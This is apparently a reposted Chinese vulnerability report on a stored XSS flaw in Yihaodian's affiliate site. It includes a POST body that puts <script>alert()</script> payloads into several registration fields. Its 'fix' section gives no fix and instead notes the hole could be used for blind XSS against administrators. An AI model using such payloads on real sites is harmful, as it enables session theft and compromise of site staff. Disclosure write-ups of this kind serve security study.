网站地图    收藏   

主页 > 后端 > 网站安全 >

一号店网站联盟未做任何过滤致存储型XSS产生

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 1.是这个站点啦!1号点网站联盟,貌似很牛B的样子http://union.yihaodian.com2.在填写基本信息这里可以插入任何特殊字符,不过客户端还是有一定的判断的,看图啦!3.但是一切客户端的过滤...

1.是这个站点啦!1号点网站联盟,貌似很牛B的样子
http://union.yihaodian.com


2.在填写基本信息这里可以插入任何特殊字符,不过客户端还是有一定的判断的,看图啦!


3.但是一切客户端的过滤都是纸老虎啦!


4.将上面post的参数值给改掉啦:
user.email=<script>alert(1)</script>&user.name=<script>alert(1)</script>&user.identityCard=<script>alert(2)</script>&user.mobile=<script>alert(3)</script>&user.phone=<script>alert(4)</script>&user.siteURl=<script>alert(5)</script>&user.siteName=<script>alert(6)</script>&user.trackerU=102826697&user.siteType=1
5.查看返回信息,就截四个图吧:

 



 


修复方案:

这个地方XSS似乎是有实际用途的吧,比如盲打管理员什么的!

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论